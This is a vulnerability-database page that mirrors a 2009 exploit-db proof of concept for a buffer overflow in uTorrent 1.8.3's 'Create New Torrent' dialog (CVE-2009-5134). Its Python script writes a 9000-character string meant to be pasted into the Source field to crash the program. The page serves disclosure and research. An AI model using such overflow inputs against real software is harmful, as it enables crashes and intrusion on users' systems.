Lucene search
+L

μTorrent (uTorrent) 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)

🗓️ 28 Aug 2009 00:00:00Reported by Dr_IDEType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC) by Dr_IDE. Old but released for playing with, fixed in version 1.8.3 (Build 16010

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-5134
28 Aug 200900:00
circl
cve
CVE
CVE-2009-5134
18 Jan 201323:00
cve
cvelist
Cvelist
CVE-2009-5134
18 Jan 201323:00
cvelist
euvd
EUVD
EUVD-2009-5089
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-5134
18 Jan 201323:55
nvd
prion
Prion
Buffer overflow
18 Jan 201323:55
prion
#!/usr/bin/env python

#####################################################################################################
#
# uTorrent <= 1.8.3 (Build 15772) Create New Torrent Buffer Overflow PoC
# By: Dr_IDE
# Note: This is old but I figured I would release it if someone wanted to play with it.
# Note: This was fixed as of version 1.8.3 (Build 16010)
# Download: http://www.filehippo.com/download_utorrent/download/9219a21fa300a93e885069c992a8a925/
# Usage: File -> Create New Torrent -> Paste string into "Source" field -> Click "Add File"
#
#####################################################################################################


buff = ("\x41" * 9000)

try:
	f1 = open("uTorrent.txt","w");
	f1.write(buff);
	f1.close();

	print "\nuTorrent <= 1.8.3 (Build 15772) Create New Torrent Buffer Overflow PoC"
	print "By: Dr_IDE"
	print "\nFile Created Successfully.\n"
	print "Usage: \n[-] Click File\n[-] Create New Torrent\n[-] Paste string into \"Source\" field\n[-] Click \"Add File\""

except:
	print "Error. File couldn't be created."

# milw0rm.com [2009-08-28]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Mar 2018 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.07707
39